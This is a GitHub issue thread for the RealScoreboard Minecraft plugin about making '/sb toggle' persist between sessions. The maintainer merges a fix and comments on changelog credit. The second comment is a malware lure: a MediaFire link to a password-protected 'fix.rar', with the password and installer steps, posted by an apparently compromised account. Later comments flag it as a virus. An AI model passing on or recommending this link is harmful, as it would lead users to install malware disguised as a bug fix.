### ISSUE TITLE
Make '/sb toggle' persist between sessions

### ISSUE THREAD

**Issue by LadyHaley** [joserodpt/RealScoreboard#78]
Could you please make the toggle command remember if its on or off between play sessions so that you dont have to toggle it every time you log onto the server

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by LadyHaley** [comment]
Anyone looking, dont download the above link, its a virus, likeley posted for a bot, obvious af lol

**Comment by Avishake2017** [comment]
I just notice it now, received tons of emails from various issues. My account was compromised, for everyone's safety let me delete the above comment

**Comment by joserodpt** [comment]
It already should persist between sessions, it's not working?

**Comment by LadyHaley** [comment]
That is correct. It is returning on relog on paper 1.20.4 #497 and paper 1.21.1 #52

**Comment by LadyHaley** [comment]
Its too late in the day for me to go test it myself, but could this be caused by not having a default scoreboard being set for a specific world name?

**Comment by LadyHaley** [comment]
It does not affect it

**Comment by joserodpt** [comment]
Testing this fix

**Comment by joserodpt** [comment]
Merge works.

**Comment by LadyHaley** [comment]
Just a heads up that on spigot in the changelog you linked to someones github profile and not this ticket

**Comment by joserodpt** [comment]
> Just a heads up that on spigot in the changelog you linked to someones github profile and not this ticket

I know, it's intentional, to give the person some credit
